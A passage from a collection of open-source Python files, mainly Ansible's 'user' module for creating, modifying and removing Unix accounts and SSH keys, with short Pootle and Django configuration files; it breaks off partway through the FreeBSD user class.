set_target(module, doc, xpath, namespaces, attribute, value)
# If an xpath was provided, we need to do something with the data
if xpath is not None:
ensure_xpath_exists(module, doc, xpath, namespaces)
# Otherwise only reformat the xml data?
if pretty_print:
make_pretty(module, doc)
module.fail_json(msg="Don't know what to do")
if __name__ == '__main__':
main()
| valentin-krasontovitsch/ansible | lib/ansible/modules/files/xml.py | Python | gpl-3.0 | 35,343 |
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import importlib
from django.apps import AppConfig
class PootleLogConfig(AppConfig):
name = "pootle_log"
verbose_name = "Pootle Log"
version = "0.1.1"
def ready(self):
importlib.import_module("pootle_log.getters")
| unho/pootle | pootle/apps/pootle_log/apps.py | Python | gpl-3.0 | 519 |
"""
WSGI config for todolist project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "todolist.settings")
application = get_wsgi_application()
| kommado/serious-integration | todolist/todolist/wsgi.py | Python | gpl-3.0 | 393 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2012, Stephen Fromm <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
module: user
version_added: "0.2"
short_description: Manage user accounts
description:
- Manage user accounts and user attributes.
- For Windows targets, use the M(win_user) module instead.
options:
name:
description:
- Name of the user to create, remove or modify.
type: str
required: true
aliases: [ user ]
uid:
description:
- Optionally sets the I(UID) of the user.
type: int
comment:
description:
- Optionally sets the description (aka I(GECOS)) of user account.
type: str
hidden:
description:
- macOS only, optionally hide the user from the login window and system preferences.
- The default will be C(yes) if the I(system) option is used.
type: bool
version_added: "2.6"
non_unique:
description:
      - Optionally, when used with the -u option, this option allows changing the user ID to a non-unique value.
type: bool
default: no
version_added: "1.1"
seuser:
description:
- Optionally sets the seuser type (user_u) on selinux enabled systems.
type: str
version_added: "2.1"
group:
description:
- Optionally sets the user's primary group (takes a group name).
type: str
groups:
description:
- List of groups user will be added to. When set to an empty string C(''),
C(null), or C(~), the user is removed from all groups except the
primary group. (C(~) means C(null) in YAML)
- Before Ansible 2.3, the only input format allowed was a comma separated string.
type: list
append:
description:
- If C(yes), add the user to the groups specified in C(groups).
- If C(no), user will only be added to the groups specified in C(groups),
removing them from all other groups.
type: bool
default: no
shell:
description:
- Optionally set the user's shell.
- On macOS, before Ansible 2.5, the default shell for non-system users was C(/usr/bin/false).
Since Ansible 2.5, the default shell for non-system users on macOS is C(/bin/bash).
- On other operating systems, the default shell is determined by the underlying tool being
used. See Notes for details.
type: str
home:
description:
- Optionally set the user's home directory.
type: path
skeleton:
description:
- Optionally set a home skeleton directory.
- Requires C(create_home) option!
type: str
version_added: "2.0"
password:
description:
- Optionally set the user's password to this crypted value.
- On macOS systems, this value has to be cleartext. Beware of security issues.
- To create a disabled account on Linux systems, set this to C('!') or C('*').
- See U(https://docs.ansible.com/ansible/faq.html#how-do-i-generate-crypted-passwords-for-the-user-module)
for details on various ways to generate these password values.
type: str
state:
description:
- Whether the account should exist or not, taking action if the state is different from what is stated.
type: str
choices: [ absent, present ]
default: present
create_home:
description:
- Unless set to C(no), a home directory will be made for the user
when the account is created or if the home directory does not exist.
- Changed from C(createhome) to C(create_home) in Ansible 2.5.
type: bool
default: yes
aliases: [ createhome ]
move_home:
description:
- "If set to C(yes) when used with C(home: ), attempt to move the user's old home
directory to the specified directory if it isn't there already and the old home exists."
type: bool
default: no
system:
description:
- When creating an account C(state=present), setting this to C(yes) makes the user a system account.
- This setting cannot be changed on existing users.
type: bool
default: no
force:
description:
- This only affects C(state=absent), it forces removal of the user and associated directories on supported platforms.
- The behavior is the same as C(userdel --force), check the man page for C(userdel) on your system for details and support.
- When used with C(generate_ssh_key=yes) this forces an existing key to be overwritten.
type: bool
default: no
remove:
description:
- This only affects C(state=absent), it attempts to remove directories associated with the user.
- The behavior is the same as C(userdel --remove), check the man page for details and support.
type: bool
default: no
login_class:
description:
- Optionally sets the user's login class, a feature of most BSD OSs.
type: str
generate_ssh_key:
description:
- Whether to generate a SSH key for the user in question.
- This will B(not) overwrite an existing SSH key unless used with C(force=yes).
type: bool
default: no
version_added: "0.9"
ssh_key_bits:
description:
- Optionally specify number of bits in SSH key to create.
type: int
default: default set by ssh-keygen
version_added: "0.9"
ssh_key_type:
description:
- Optionally specify the type of SSH key to generate.
- Available SSH key types will depend on implementation
present on target host.
type: str
default: rsa
version_added: "0.9"
ssh_key_file:
description:
- Optionally specify the SSH key filename.
- If this is a relative filename then it will be relative to the user's home directory.
- This parameter defaults to I(.ssh/id_rsa).
type: path
version_added: "0.9"
ssh_key_comment:
description:
- Optionally define the comment for the SSH key.
type: str
default: ansible-generated on $HOSTNAME
version_added: "0.9"
ssh_key_passphrase:
description:
- Set a passphrase for the SSH key.
- If no passphrase is provided, the SSH key will default to having no passphrase.
type: str
version_added: "0.9"
update_password:
description:
- C(always) will update passwords if they differ.
- C(on_create) will only set the password for newly created users.
type: str
choices: [ always, on_create ]
default: always
version_added: "1.3"
expires:
description:
- An expiry time for the user in epoch, it will be ignored on platforms that do not support this.
- Currently supported on GNU/Linux, FreeBSD, and DragonFlyBSD.
      - Since Ansible 2.6 you can remove the expiry time by specifying a negative value.
Currently supported on GNU/Linux and FreeBSD.
type: float
version_added: "1.9"
password_lock:
description:
- Lock the password (usermod -L, pw lock, usermod -C).
- BUT implementation differs on different platforms, this option does not always mean the user cannot login via other methods.
- This option does not disable the user, only lock the password. Do not change the password in the same task.
- Currently supported on Linux, FreeBSD, DragonFlyBSD, NetBSD, OpenBSD.
type: bool
version_added: "2.6"
local:
description:
- Forces the use of "local" command alternatives on platforms that implement it.
      - This is useful in environments that use centralized authentication when you want to manipulate the local users
(i.e. it uses C(luseradd) instead of C(useradd)).
- This requires that these commands exist on the targeted host, otherwise it will be a fatal error.
type: bool
default: no
version_added: "2.4"
profile:
description:
- Sets the profile of the user.
- Does nothing when used with other platforms.
- Can set multiple profiles using comma separation.
- To delete all the profiles, use C(profile='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
authorization:
description:
- Sets the authorization of the user.
- Does nothing when used with other platforms.
- Can set multiple authorizations using comma separation.
- To delete all authorizations, use C(authorization='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
role:
description:
- Sets the role of the user.
- Does nothing when used with other platforms.
- Can set multiple roles using comma separation.
- To delete all roles, use C(role='').
- Currently supported on Illumos/Solaris.
type: str
version_added: "2.8"
notes:
- There are specific requirements per platform on user management utilities. However
they generally come pre-installed with the system and Ansible will require they
are present at runtime. If they are not, a descriptive error message will be shown.
- On SunOS platforms, the shadow file is backed up automatically since this module edits it directly.
On other platforms, the shadow file is backed up by the underlying tools used by this module.
- On macOS, this module uses C(dscl) to create, modify, and delete accounts. C(dseditgroup) is used to
modify group membership. Accounts are hidden from the login window by modifying
C(/Library/Preferences/com.apple.loginwindow.plist).
- On FreeBSD, this module uses C(pw useradd) and C(chpass) to create, C(pw usermod) and C(chpass) to modify,
  C(pw userdel) to remove, C(pw lock) to lock, and C(pw unlock) to unlock accounts.
- On all other platforms, this module uses C(useradd) to create, C(usermod) to modify, and
C(userdel) to remove accounts.
seealso:
- module: authorized_key
- module: group
- module: win_user
author:
- Stephen Fromm (@sfromm)
'''
EXAMPLES = r'''
- name: Add the user 'johnd' with a specific uid and a primary group of 'admin'
user:
name: johnd
comment: John Doe
uid: 1040
group: admin
- name: Add the user 'james' with a bash shell, appending the group 'admins' and 'developers' to the user's groups
user:
name: james
shell: /bin/bash
groups: admins,developers
append: yes
- name: Remove the user 'johnd'
user:
name: johnd
state: absent
remove: yes
- name: Create a 2048-bit SSH key for user jsmith in ~jsmith/.ssh/id_rsa
user:
name: jsmith
generate_ssh_key: yes
ssh_key_bits: 2048
ssh_key_file: .ssh/id_rsa
- name: Add a consultant whose account you want to expire
user:
name: james18
shell: /bin/zsh
groups: developers
expires: 1422403387
- name: Starting at Ansible 2.6, modify user, remove expiry time
user:
name: james18
expires: -1
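# Additional illustrative example (not part of the upstream EXAMPLES): locking the
# password of an existing account via the 'password_lock' option documented above.
# Per the option notes, do not change the password in the same task.
- name: Lock the password of the user 'james18'
  user:
    name: james18
    password_lock: yes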
'''
RETURN = r'''
append:
description: Whether or not to append the user to groups
returned: When state is 'present' and the user exists
type: bool
sample: True
comment:
description: Comment section from passwd file, usually the user name
returned: When user exists
type: str
sample: Agent Smith
create_home:
description: Whether or not to create the home directory
returned: When user does not exist and not check mode
type: bool
sample: True
force:
description: Whether or not a user account was forcibly deleted
returned: When state is 'absent' and user exists
type: bool
sample: False
group:
description: Primary user group ID
returned: When user exists
type: int
sample: 1001
groups:
description: List of groups of which the user is a member
returned: When C(groups) is not empty and C(state) is 'present'
type: str
sample: 'chrony,apache'
home:
description: "Path to user's home directory"
returned: When C(state) is 'present'
type: str
sample: '/home/asmith'
move_home:
description: Whether or not to move an existing home directory
returned: When C(state) is 'present' and user exists
type: bool
sample: False
name:
description: User account name
returned: always
type: str
sample: asmith
password:
description: Masked value of the password
returned: When C(state) is 'present' and C(password) is not empty
type: str
sample: 'NOT_LOGGING_PASSWORD'
remove:
description: Whether or not to remove the user account
returned: When C(state) is 'absent' and user exists
type: bool
sample: True
shell:
description: User login shell
returned: When C(state) is 'present'
type: str
sample: '/bin/bash'
ssh_fingerprint:
description: Fingerprint of generated SSH key
returned: When C(generate_ssh_key) is C(True)
type: str
sample: '2048 SHA256:aYNHYcyVm87Igh0IMEDMbvW0QDlRQfE0aJugp684ko8 ansible-generated on host (RSA)'
ssh_key_file:
description: Path to generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: /home/asmith/.ssh/id_rsa
ssh_public_key:
description: Generated SSH public key file
returned: When C(generate_ssh_key) is C(True)
type: str
sample: >
'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC95opt4SPEC06tOYsJQJIuN23BbLMGmYo8ysVZQc4h2DZE9ugbjWWGS1/pweUGjVstgzMkBEeBCByaEf/RJKNecKRPeGd2Bw9DCj/bn5Z6rGfNENKBmo
618mUJBvdlEgea96QGjOwSB7/gmonduC7gsWDMNcOdSE3wJMTim4lddiBx4RgC9yXsJ6Tkz9BHD73MXPpT5ETnse+A3fw3IGVSjaueVnlUyUmOBf7fzmZbhlFVXf2Zi2rFTXqvbdGHKkzpw1U8eB8xFPP7y
d5u1u0e6Acju/8aZ/l17IDFiLke5IzlqIMRTEbDwLNeO84YQKWTm9fODHzhYe0yvxqLiK07 ansible-generated on host'
stderr:
description: Standard error from running commands
returned: When stderr is returned by a command that is run
type: str
sample: Group wheels does not exist
stdout:
description: Standard output from running commands
returned: When standard output is returned by the command that is run
type: str
sample:
system:
description: Whether or not the account is a system account
returned: When C(system) is passed to the module and the account does not exist
type: bool
sample: True
uid:
description: User ID of the user account
returned: When C(UID) is passed to the module
type: int
sample: 1044
'''
import errno
import grp
import calendar
import os
import re
import pty
import pwd
import select
import shutil
import socket
import subprocess
import time
from ansible.module_utils import distro
from ansible.module_utils._text import to_native, to_bytes, to_text
from ansible.module_utils.basic import load_platform_subclass, AnsibleModule
try:
import spwd
HAVE_SPWD = True
except ImportError:
HAVE_SPWD = False
_HASH_RE = re.compile(r'[^a-zA-Z0-9./=]')
class User(object):
"""
This is a generic User manipulation class that is subclassed
based on platform.
A subclass may wish to override the following action methods:-
- create_user()
- remove_user()
- modify_user()
- ssh_key_gen()
- ssh_key_fingerprint()
- user_exists()
All subclasses MUST define platform and distribution (which may be None).
"""
platform = 'Generic'
distribution = None
SHADOWFILE = '/etc/shadow'
SHADOWFILE_EXPIRE_INDEX = 7
LOGIN_DEFS = '/etc/login.defs'
DATE_FORMAT = '%Y-%m-%d'
def __new__(cls, *args, **kwargs):
return load_platform_subclass(User, args, kwargs)
def __init__(self, module):
self.module = module
self.state = module.params['state']
self.name = module.params['name']
self.uid = module.params['uid']
self.hidden = module.params['hidden']
self.non_unique = module.params['non_unique']
self.seuser = module.params['seuser']
self.group = module.params['group']
self.comment = module.params['comment']
self.shell = module.params['shell']
self.password = module.params['password']
self.force = module.params['force']
self.remove = module.params['remove']
self.create_home = module.params['create_home']
self.move_home = module.params['move_home']
self.skeleton = module.params['skeleton']
self.system = module.params['system']
self.login_class = module.params['login_class']
self.append = module.params['append']
self.sshkeygen = module.params['generate_ssh_key']
self.ssh_bits = module.params['ssh_key_bits']
self.ssh_type = module.params['ssh_key_type']
self.ssh_comment = module.params['ssh_key_comment']
self.ssh_passphrase = module.params['ssh_key_passphrase']
self.update_password = module.params['update_password']
self.home = module.params['home']
self.expires = None
self.password_lock = module.params['password_lock']
self.groups = None
self.local = module.params['local']
self.profile = module.params['profile']
self.authorization = module.params['authorization']
self.role = module.params['role']
if module.params['groups'] is not None:
self.groups = ','.join(module.params['groups'])
if module.params['expires'] is not None:
try:
self.expires = time.gmtime(module.params['expires'])
except Exception as e:
module.fail_json(msg="Invalid value for 'expires' %s: %s" % (self.expires, to_native(e)))
if module.params['ssh_key_file'] is not None:
self.ssh_file = module.params['ssh_key_file']
else:
self.ssh_file = os.path.join('.ssh', 'id_%s' % self.ssh_type)
def check_password_encrypted(self):
# Darwin needs cleartext password, so skip validation
if self.module.params['password'] and self.platform != 'Darwin':
maybe_invalid = False
# Allow setting the password to * or ! in order to disable the account
if self.module.params['password'] in set(['*', '!']):
maybe_invalid = False
else:
# : for delimiter, * for disable user, ! for lock user
# these characters are invalid in the password
if any(char in self.module.params['password'] for char in ':*!'):
maybe_invalid = True
if '$' not in self.module.params['password']:
maybe_invalid = True
else:
fields = self.module.params['password'].split("$")
if len(fields) >= 3:
# contains character outside the crypto constraint
if bool(_HASH_RE.search(fields[-1])):
maybe_invalid = True
# md5
if fields[1] == '1' and len(fields[-1]) != 22:
maybe_invalid = True
# sha256
if fields[1] == '5' and len(fields[-1]) != 43:
maybe_invalid = True
# sha512
if fields[1] == '6' and len(fields[-1]) != 86:
maybe_invalid = True
else:
maybe_invalid = True
if maybe_invalid:
self.module.warn("The input password appears not to have been hashed. "
"The 'password' argument must be encrypted for this module to work properly.")
def execute_command(self, cmd, use_unsafe_shell=False, data=None, obey_checkmode=True):
if self.module.check_mode and obey_checkmode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
else:
# cast all args to strings ansible-modules-core/issues/4397
cmd = [str(x) for x in cmd]
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def backup_shadow(self):
if not self.module.check_mode and self.SHADOWFILE:
return self.module.backup_local(self.SHADOWFILE)
def remove_user_userdel(self):
if self.local:
command_name = 'luserdel'
else:
command_name = 'userdel'
cmd = [self.module.get_bin_path(command_name, True)]
if self.force:
cmd.append('-f')
if self.remove:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def create_user_useradd(self):
if self.local:
command_name = 'luseradd'
else:
command_name = 'useradd'
cmd = [self.module.get_bin_path(command_name, True)]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.seuser is not None:
cmd.append('-Z')
cmd.append(self.seuser)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
elif self.group_exists(self.name):
# use the -N option (no user group) if a group already
# exists with the same name as the user to prevent
# errors from useradd trying to create a group when
# USERGROUPS_ENAB is set in /etc/login.defs.
if os.path.exists('/etc/redhat-release'):
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release <= 5:
cmd.append('-n')
else:
cmd.append('-N')
elif os.path.exists('/etc/SuSE-release'):
# -N did not exist in useradd before SLE 11 and did not
# automatically create a group
dist = distro.linux_distribution(full_distribution_name=False)
major_release = int(dist[1].split('.')[0])
if major_release >= 12:
cmd.append('-N')
else:
cmd.append('-N')
if self.groups is not None and len(self.groups):
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('')
else:
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
if self.password is not None:
cmd.append('-p')
cmd.append(self.password)
if self.create_home:
if not self.local:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
else:
cmd.append('-M')
if self.system:
cmd.append('-r')
cmd.append(self.name)
return self.execute_command(cmd)
def _check_usermod_append(self):
# check if this version of usermod can append groups
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
usermod_path = self.module.get_bin_path(command_name, True)
# for some reason, usermod --help cannot be used by non root
# on RH/Fedora, due to lack of execute bit for others
if not os.access(usermod_path, os.X_OK):
return False
cmd = [usermod_path, '--help']
(rc, data1, data2) = self.execute_command(cmd, obey_checkmode=False)
helpout = data1 + data2
# check if --append exists
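        # e.g. a matching help line (exact wording may vary by distribution):
        #   -a, --append                  append the user to the supplemental GROUPS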
lines = to_native(helpout).split('\n')
for line in lines:
if line.strip().startswith('-a, --append'):
return True
return False
def modify_user_usermod(self):
if self.local:
command_name = 'lusermod'
else:
command_name = 'usermod'
cmd = [self.module.get_bin_path(command_name, True)]
info = self.user_info()
has_append = self._check_usermod_append()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
# get a list of all groups for the user, including the primary
current_groups = self.user_group_membership(exclude_primary=False)
groups_need_mod = False
groups = []
if self.groups == '':
if current_groups and not self.append:
groups_need_mod = True
else:
groups = self.get_groups_set(remove_existing=False)
group_diff = set(current_groups).symmetric_difference(groups)
if group_diff:
if self.append:
for g in groups:
if g in group_diff:
if has_append:
cmd.append('-a')
groups_need_mod = True
break
else:
groups_need_mod = True
if groups_need_mod:
if self.append and not has_append:
cmd.append('-A')
cmd.append(','.join(group_diff))
else:
cmd.append('-G')
cmd.append(','.join(groups))
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None and info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.move_home:
cmd.append('-m')
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.expires is not None:
current_expires = int(self.user_password()[1])
if self.expires < time.gmtime(0):
if current_expires >= 0:
cmd.append('-e')
cmd.append('')
else:
# Convert days since Epoch to seconds since Epoch as struct_time
current_expire_date = time.gmtime(current_expires * 86400)
# Current expires is negative or we compare year, month, and day only
if current_expires < 0 or current_expire_date[:3] != self.expires[:3]:
cmd.append('-e')
cmd.append(time.strftime(self.DATE_FORMAT, self.expires))
# Lock if no password or unlocked, unlock only if locked
if self.password_lock and not info[1].startswith('!'):
cmd.append('-L')
elif self.password_lock is False and info[1].startswith('!'):
# usermod will refuse to unlock a user with no password, module shows 'changed' regardless
cmd.append('-U')
if self.update_password == 'always' and self.password is not None and info[1] != self.password:
cmd.append('-p')
cmd.append(self.password)
# skip if no changes to be made
if len(cmd) == 1:
return (None, '', '')
cmd.append(self.name)
return self.execute_command(cmd)
def group_exists(self, group):
try:
# Try group as a gid first
grp.getgrgid(int(group))
return True
except (ValueError, KeyError):
try:
grp.getgrnam(group)
return True
except KeyError:
return False
def group_info(self, group):
if not self.group_exists(group):
return False
try:
# Try group as a gid first
return list(grp.getgrgid(int(group)))
except (ValueError, KeyError):
return list(grp.getgrnam(group))
def get_groups_set(self, remove_existing=True):
if self.groups is None:
return None
info = self.user_info()
groups = set(x.strip() for x in self.groups.split(',') if x)
for g in groups.copy():
if not self.group_exists(g):
self.module.fail_json(msg="Group %s does not exist" % (g))
if info and remove_existing and self.group_info(g)[2] == info[3]:
groups.remove(g)
return groups
def user_group_membership(self, exclude_primary=True):
''' Return a list of groups the user belongs to '''
groups = []
info = self.get_pwd_info()
for group in grp.getgrall():
if self.name in group.gr_mem:
# Exclude the user's primary group by default
if not exclude_primary:
groups.append(group[0])
else:
if info[3] != group.gr_gid:
groups.append(group[0])
return groups
def user_exists(self):
try:
if pwd.getpwnam(self.name):
return True
except KeyError:
return False
def get_pwd_info(self):
if not self.user_exists():
return False
return list(pwd.getpwnam(self.name))
def user_info(self):
if not self.user_exists():
return False
info = self.get_pwd_info()
if len(info[1]) == 1 or len(info[1]) == 0:
info[1] = self.user_password()[0]
return info
def user_password(self):
passwd = ''
expires = ''
if HAVE_SPWD:
try:
passwd = spwd.getspnam(self.name)[1]
expires = spwd.getspnam(self.name)[7]
return passwd, expires
except KeyError:
return passwd, expires
except OSError as e:
# Python 3.6 raises PermissionError instead of KeyError
# Due to absence of PermissionError in python2.7 need to check
# errno
if e.errno in (errno.EACCES, errno.EPERM):
return passwd, expires
raise
if not self.user_exists():
return passwd, expires
elif self.SHADOWFILE:
# Read shadow file for user's encrypted password string
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
passwd = line.split(':')[1]
expires = line.split(':')[self.SHADOWFILE_EXPIRE_INDEX] or -1
return passwd, expires
def get_ssh_key_path(self):
info = self.user_info()
if os.path.isabs(self.ssh_file):
ssh_key_file = self.ssh_file
else:
if not os.path.exists(info[5]) and not self.module.check_mode:
raise Exception('User %s home directory does not exist' % self.name)
ssh_key_file = os.path.join(info[5], self.ssh_file)
return ssh_key_file
def ssh_key_gen(self):
info = self.user_info()
overwrite = None
try:
ssh_key_file = self.get_ssh_key_path()
except Exception as e:
return (1, '', to_native(e))
ssh_dir = os.path.dirname(ssh_key_file)
if not os.path.exists(ssh_dir):
if self.module.check_mode:
return (0, '', '')
try:
os.mkdir(ssh_dir, int('0700', 8))
os.chown(ssh_dir, info[2], info[3])
except OSError as e:
return (1, '', 'Failed to create %s: %s' % (ssh_dir, to_native(e)))
if os.path.exists(ssh_key_file):
if self.force:
# ssh-keygen doesn't support overwriting the key interactively, so send 'y' to confirm
overwrite = 'y'
else:
return (None, 'Key already exists, use "force: yes" to overwrite', '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-t')
cmd.append(self.ssh_type)
if self.ssh_bits > 0:
cmd.append('-b')
cmd.append(self.ssh_bits)
cmd.append('-C')
cmd.append(self.ssh_comment)
cmd.append('-f')
cmd.append(ssh_key_file)
if self.ssh_passphrase is not None:
if self.module.check_mode:
self.module.debug('In check mode, would have run: "%s"' % cmd)
return (0, '', '')
master_in_fd, slave_in_fd = pty.openpty()
master_out_fd, slave_out_fd = pty.openpty()
master_err_fd, slave_err_fd = pty.openpty()
env = os.environ.copy()
env['LC_ALL'] = 'C'
try:
p = subprocess.Popen([to_bytes(c) for c in cmd],
stdin=slave_in_fd,
stdout=slave_out_fd,
stderr=slave_err_fd,
preexec_fn=os.setsid,
env=env)
out_buffer = b''
err_buffer = b''
while p.poll() is None:
r, w, e = select.select([master_out_fd, master_err_fd], [], [], 1)
first_prompt = b'Enter passphrase (empty for no passphrase):'
second_prompt = b'Enter same passphrase again'
prompt = first_prompt
for fd in r:
if fd == master_out_fd:
chunk = os.read(master_out_fd, 10240)
out_buffer += chunk
if prompt in out_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
else:
chunk = os.read(master_err_fd, 10240)
err_buffer += chunk
if prompt in err_buffer:
os.write(master_in_fd, to_bytes(self.ssh_passphrase, errors='strict') + b'\r')
prompt = second_prompt
if b'Overwrite (y/n)?' in out_buffer or b'Overwrite (y/n)?' in err_buffer:
# The key was created between us checking for existence and now
return (None, 'Key already exists', '')
rc = p.returncode
out = to_native(out_buffer)
err = to_native(err_buffer)
except OSError as e:
return (1, '', to_native(e))
else:
cmd.append('-N')
cmd.append('')
(rc, out, err) = self.execute_command(cmd, data=overwrite)
if rc == 0 and not self.module.check_mode:
# If the keys were successfully created, we should be able
# to tweak ownership.
os.chown(ssh_key_file, info[2], info[3])
os.chown('%s.pub' % ssh_key_file, info[2], info[3])
return (rc, out, err)
def ssh_key_fingerprint(self):
ssh_key_file = self.get_ssh_key_path()
if not os.path.exists(ssh_key_file):
return (1, 'SSH Key file %s does not exist' % ssh_key_file, '')
cmd = [self.module.get_bin_path('ssh-keygen', True)]
cmd.append('-l')
cmd.append('-f')
cmd.append(ssh_key_file)
return self.execute_command(cmd, obey_checkmode=False)
def get_ssh_public_key(self):
ssh_public_key_file = '%s.pub' % self.get_ssh_key_path()
try:
with open(ssh_public_key_file, 'r') as f:
ssh_public_key = f.read().strip()
except IOError:
return None
return ssh_public_key
def create_user(self):
# by default we use the create_user_useradd method
return self.create_user_useradd()
def remove_user(self):
# by default we use the remove_user_userdel method
return self.remove_user_userdel()
def modify_user(self):
# by default we use the modify_user_usermod method
return self.modify_user_usermod()
def create_homedir(self, path):
if not os.path.exists(path):
if self.skeleton is not None:
skeleton = self.skeleton
else:
skeleton = '/etc/skel'
if os.path.exists(skeleton):
try:
shutil.copytree(skeleton, path, symlinks=True)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
else:
try:
os.makedirs(path)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# get umask from /etc/login.defs and set correct home mode
if os.path.exists(self.LOGIN_DEFS):
with open(self.LOGIN_DEFS, 'r') as f:
for line in f:
m = re.match(r'^UMASK\s+(\d+)$', line)
if m:
umask = int(m.group(1), 8)
mode = 0o777 & ~umask
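                        # e.g. a login.defs UMASK of 022 yields a home directory mode of 0o755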
try:
os.chmod(path, mode)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
def chown_homedir(self, uid, gid, path):
try:
os.chown(path, uid, gid)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chown(os.path.join(root, d), uid, gid)
for f in files:
os.chown(os.path.join(root, f), uid, gid)
except OSError as e:
self.module.exit_json(failed=True, msg="%s" % to_native(e))
# ===========================================
class FreeBsdUser(User):
"""
This is a FreeBSD User manipulation class - it uses the pw command
to manipulate the user database, followed by the chpass command
to change the password.
This overrides the following methods from the generic class:-
- create_user()
- remove_user()
- modify_user()
"""
platform = 'FreeBSD'
distribution = None
SHADOWFILE = '/etc/master.passwd'
SHADOWFILE_EXPIRE_INDEX = 6
DATE_FORMAT = '%d-%b-%Y'
def remove_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'userdel',
'-n',
self.name
]
if self.remove:
cmd.append('-r')
return self.execute_command(cmd)
def create_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'useradd',
'-n',
self.name,
]
if self.uid is not None:
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
cmd.append('-d')
cmd.append(self.home)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
cmd.append('-g')
cmd.append(self.group)
if self.groups is not None:
groups = self.get_groups_set()
cmd.append('-G')
cmd.append(','.join(groups))
if self.create_home:
cmd.append('-m')
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.shell is not None:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
cmd.append('-L')
cmd.append(self.login_class)
if self.expires is not None:
cmd.append('-e')
if self.expires < time.gmtime(0):
cmd.append('0')
else:
cmd.append(str(calendar.timegm(self.expires)))
        # system cannot be handled currently - should we error if it's requested?
# create the user
(rc, out, err) = self.execute_command(cmd)
if rc is not None and rc != 0:
self.module.fail_json(name=self.name, msg=err, rc=rc)
# we have to set the password in a second command
if self.password is not None:
cmd = [
self.module.get_bin_path('chpass', True),
'-p',
self.password,
self.name
]
return self.execute_command(cmd)
return (rc, out, err)
def modify_user(self):
cmd = [
self.module.get_bin_path('pw', True),
'usermod',
'-n',
self.name
]
cmd_len = len(cmd)
info = self.user_info()
if self.uid is not None and info[2] != int(self.uid):
cmd.append('-u')
cmd.append(self.uid)
if self.non_unique:
cmd.append('-o')
if self.comment is not None and info[4] != self.comment:
cmd.append('-c')
cmd.append(self.comment)
if self.home is not None:
if (info[5] != self.home and self.move_home) or (not os.path.exists(self.home) and self.create_home):
cmd.append('-m')
if info[5] != self.home:
cmd.append('-d')
cmd.append(self.home)
if self.skeleton is not None:
cmd.append('-k')
cmd.append(self.skeleton)
if self.group is not None:
if not self.group_exists(self.group):
self.module.fail_json(msg="Group %s does not exist" % self.group)
ginfo = self.group_info(self.group)
if info[3] != ginfo[2]:
cmd.append('-g')
cmd.append(self.group)
if self.shell is not None and info[6] != self.shell:
cmd.append('-s')
cmd.append(self.shell)
if self.login_class is not None:
# find current login class
user_login_class = None
if os.path.exists(self.SHADOWFILE) and os.access(self.SHADOWFILE, os.R_OK):
with open(self.SHADOWFILE, 'r') as f:
for line in f:
if line.startswith('%s:' % self.name):
user_login_class = line.split(':')[4]
# act only if login_class change
if self.login_class != user_login_class:
